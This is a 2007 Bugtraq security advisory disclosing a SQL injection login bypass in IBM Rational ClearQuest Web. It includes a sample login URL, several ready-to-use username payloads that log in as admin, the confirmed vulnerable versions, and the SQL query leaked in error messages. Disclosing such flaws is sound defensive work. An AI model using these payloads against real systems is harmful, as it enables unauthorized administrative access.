IBM Rational ClearQuest Web SQL Injection Login Bypass

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: IBM Rational ClearQuest Web SQL Injection Login Bypass
From: swhite@xxxxxxxxxxxxxxx
Date: 14 Aug 2007 17:53:17 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

+==============================================================+
+   IBM Rational ClearQuest Web Login Bypass (SQL Injection)   +
+==============================================================+

DISCOVERED BY:
==============
SecureState
  sasquatch - swhite@xxxxxxxxxxxxxxx
  rel1k - dkennedy@xxxxxxxxxxxxxxx

HOMEPAGE:
=========
www.securestate.com


AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to 
SQL injection...


SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE

Log in as "admin":
==================
' OR login_name LIKE '%admin%'--

(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...

Confirmed against:
==================
version 7.0.0.1        Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630

FULL SQL Statement is spit back in error message:
=================================================
SELECT
   master_users.master_dbid, master_users.login_name, 
master_users.encrypted_password,
   master_users.email, master_users.fullname, master_users.phone, 
master_users.misc_info,
   master_users.is_active, master_users.is_superuser, 
master_users.is_appbuilder,
   master_users.is_user_maint, ratl_mastership, ratl_keysite, 
master_users.ratl_priv_mask
FROM
   master_users
WHERE
   login_name = 'INJECTION GOES HERE

Prev by Date: WireShark MMS Remote Denial of Service vulnerability
Next by Date: Re: COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability
Previous by thread: WireShark MMS Remote Denial of Service vulnerability
Next by thread: EEYE: VGX.DLL Compressed Content Heap Overflow Vulnerability
Index(es):
- Date
- Thread